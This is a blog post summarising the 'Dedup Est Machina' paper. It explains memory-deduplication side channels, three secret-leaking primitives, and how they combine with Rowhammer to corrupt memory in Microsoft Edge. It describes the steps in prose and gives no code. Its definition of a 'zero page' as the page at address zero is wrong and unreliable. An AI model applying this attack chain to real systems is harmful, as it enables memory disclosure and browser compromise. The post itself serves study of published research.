Thursday, November 3, 2016

Study Group - Dedup est Machina

The title of the paper is 'Dedup Est Machina: Memory Deduplication as an Advanced Exploitation Vector'.

I saw the paper being presented at the IEEE Security and Privacy Symposium, and it was one of the more enjoyable talks due to the nature of the exploit, and the enthusiasm of Erik Bosman presenting it. It also won a 'PWNIE' award for the 'most innovative research on hacking' at Black Hat USA this year.

The idea of the paper is simple - to combine the Memory Deduplication exploit with a Rowhammer attack.

They use this to craft a JavaScript-based attack against the Microsoft Edge browser, to gain arbitrary memory read and write access in the browser.

Memory Deduplication


The idea is to reduce the total memory footprint of a running system by sharing memory pages with identical content across independent processes.

A good example of this is the page cache in modern operating systems. The page cache stores a single cached copy of file system contents in memory, and shares the copy across different processes.

In running processes, two or more pages with the same content in run-time memory are always deduplicated, even if the pages are completed unrelated, and their equivalence is fortuitous.

So, in order to keep a single copy of a number of identical pages, the memory deduplication system needs to perform three tasks:
  1. Detect. The system needs to detect memory pages with the same content, usually done at regular and predetermined intervals during normal system operations
  2. Only Keep One. We only want to keep one physical copy, and return the others to the memory allocator; to do this, the deduplication system updates the page-table entries of the owning processes, so that the virtual addresses now point to a single shared copy; these entries are also marked as read-only to support copy-on-write semantics
  3. Create Private Copy on Write. Specifically, when one of the owning processes writes to the read only page, a copy-on-write page fault occurs; at this point, the memory deduplication system can create a private copy of the page, and map it into the corresponding page table entries of the faulting process
On Windows 8.1 onwards, it's known as memory combining.

Memory Deduplication as a Side Channel


So you may have spotted how you could exploit this as a side channel. Writing to a shared page from any of the owning processes results in a page fault and a subsequent page copy.

Due to these additional expensive operations, a write to a shared page takes significantly longer compared to a write to a regular page (by significantly longer, we're talking up to one order of magnitude). This timing difference provides an attacker with a side channel to detect whether a given page exists in the system.

To do this, the attacker has four easy steps:
  1. Craft a page with the exact same content as the target page
  2. Wait for the memory deduplication system to do its thing
  3. Write to the crafted page
  4. Time how long it takes for the write operation to finish
If the write takes longer than a write to a non-deduplicated page, the attacker can conclude that a page with the same content exists.

So just using this, an attacker could detect whether a user was visiting a particular web page, or running a particular program.

Of course, false positives are possible due to noise etc, so the attacker can use redundancy (repeated attempts) to disclose the intended information in a reliable way.

At the moment, the memory deduplication side channel is looking a little bit pathetic, as it's a slow single-bit side channel that can only be used for leaking a limited number of bits from a victim process.

However, we can abuse memory deduplication to get some stronger primitives.

Primitives

Primitive #1: Alignment Probing



First up, we have a primitive that allows a byte-by-byte probing of secret information by controlling its alignment in memory. So, this primitive is applicable when the secret data has weak alignment properties.

Imagine in this case, the secret is a password stored in memory immediately after a blob of attacker-provided input bytes. What the attacker can do is provide some more input bytes, which effectively push the second part of the secret out of the target page. Now the attacker can brute force the first part of the secret (e.g. one byte) using deduplication.

All the attacker needs to do now is provide fewer input bytes to bring another portion of the secret back into the page. Just like before, the attacker uses deduplication to get the rest of the secret. For larger secrets, you just keep repeating these steps until all of the secret is known.

This alignment probing primitive is apparently very effective, and is used to disclose code pointers in Microsoft Edge, and a password hash in nginx.

Primitive #2: Partial Reuse



When the secret has strong memory alignment properties, the first primitive falls through.

Up next is a primitive that can be used when attacker-controlled input can partially overwrite stale secret data with predictable reuse properties. User-space memory allocators encourage memory reuse and do not normally zero out deallocated buffers for performance reasons.

This means that a target application often reuses the same memory page and selectively overwrites the content of a reused page with new data.

So, same set up as before. This time, when the attacker gives a larger input, it overwrites the first part of the secret. Now the attacker can brute force the second part using memory deduplication.

Once this is known, the attacker can brute force the first part of the secret, by deduplicating against a page without an overwritten secret.

This primitive is apparently fairly common in practice, and is used in the paper to break heap ASLR (Address Space Layout Randomisation) in nginx.

Primitive #3: Birthday Heap Spray

Last one. This primitive can leak a secret even when the attacker has no control over memory alignment or reuse. It relies on a generative approach that revolves around the birthday paradox, which we all know and love.

This primitive is applicable when the attacker can force the application to controllably spray target secrets over memory.
Up until now we have only assumed there is one secret we want to leak.

If a partially masked secret has $P$ possible values, we use memory deduplication to perform $1 \times P$ comparisons between the $P$ probe pages and the single target page - essentially brute forcing the secret.

For large $P$, a very large amount of memory is required, for the attack, and for the redundancy. However, if the attacker can cause the target application to generate many secrets, memory deduplication provides a much stronger primitive than brute forcing.

For instance, an attacker can generate a large number of secret heap pointers by creating a large number of objects from JavaScript, each referencing another object.

So, assume the attacker causes the application to generate $S$ such pages, each with a different secret pointer. The attacker now also creates $P$ probe pages, with $P$ being roughly the same size as $S$.

Each probe page uses the same encoding as the secret pages, except that, not knowing the secret pointers, the attacker needs to 'guess' their values. Each probe page contains a different guessed value. The idea is to find at least one of the probe pages matching any of the secret pages. So we have a classic Birthday Problem, where the secret and probe values are the birthdays.

Since memory deduplication compares any page with any other page in each deduplication pass, it automatically tests all $P$ probe pages against the $S$ target secret pages.

A hit on any of the $P$ possible values immediately exposes a target secret. This birthday primitive reduces the memory requirements of the attack by a factor of $S$. It's especially useful when leaking the location of randomised pointers. For exploitation purposes, it's not important which pointer the attacker hits, as long as at least one of them is hit.

This primitive is used to leak a randomised heap pointer in Microsoft Edge, and also used to craft a reliable Rowhammer exploit.

Rowhammer Exploit

Anyway, now we get to the good bit; the Rowhammer exploit. The Rowhammer bug was first publicly disclosed in June 2014 by Kim et al. However, it was not until March 2015 that someone published a working Linux kernel privilege escalation exploit using Rowhammer.

Essentially, Rowhammer is DRAM vulnerability that allows an attacker to flip bits in a (victim) memory page by repeatedly reading from other (aggressor) memory pages. These bit flips are deterministic, meaning that once a vulnerable memory location is identified, it is possible to reproduce the bit flip patterns by reading again the same set of aggressor pages.

There are two variations of the Rowhammer attack. Single-sided Rowhammer repeatedly activates a single row to corrupt its neighbouring rows' cells. Double-sided Rowhammer targets a single row by repeatedly activating both its neighbours rows. Although double-sided is more effective than single-sided in practice, it requires you to know not only the location of what you want to target, but also the two adjacent memory pages. Therefore, the authors of this paper choose to use the single-sided Rowhammer attack.

So, if you want to use the Rowhammer attack to do something useful, rather than to just corrupt random memory pages, then first you need to find a vulnerable memory location. To do this, you can allocate a large array filled with doubles. If you do it right, you can end up with an encoded double value such that all bits are set to 1.

Then, you find some eviction sets so you can bypass the cache, and you hammer 32 pages at a time (though it doesn't say where they get the number 32 from). By hammer, I mean you read from each page two million times before moving to the next page. Once you've gone through all 32 pages, you check the entire Array for bit flips. After scanning a sufficient number of pages, you will know which bits can be flipped at which offsets.

Next, you want to determine what to place in these vulnerable memory locations to craft the exploit. The idea behind the Rowhammer attack in this paper, is to place some data in the array which, after a bit flip, can yield a reference to a controlled counterfeit object.



So once we find out which bit is flipped, we can store a valid object reference at the vulnerable memory location and pivot to a counterfeit object with Rowhammer.

So that's the attack - using memory deduplication to leak the code and heap pointers, and Rowhammer to pivot them to a counterfeit object.  In practice, the paper says it takes about 30 minutes for the two deduplication passes and 508MB of memory. It also takes 1GB of memory to find bit flips, and 32MB to find the cache eviction sets. The timing of the Rowhammer depends on the vulnerable DRAM chips, so they say it varies from seconds to hours in practice.


Mitigation

So finally, the last part of the paper talks about how one would prevent attacks like this. A fairly obvious observation would be to just no deduplicate, as that prevents all exploits like this. However, deduplication contributes heavily to using physical memory efficiently, so we would like to keep it if possible.

This paper suggests that you only deduplicate zero pages. A zero page is a page with a starting address of zero, or rather, the series of memory addresses at the absolute beginning of a computer's address space. The paper doesn't go into much detail about why, but claims they've done experiments to show that it's nearly as efficient as full deduplication, but entirely eliminates the possibility for any attacks targeting memory deduplication.

Fin

So that's the end of paper, they finish by saying memory deduplication is dangerous in the wrong hands, and they've been working with their contacts at Microsoft to find an immediate solution.

I had a look round on the internet but no-ones has published anything further since the paper, so who knows?

No comments:

Post a Comment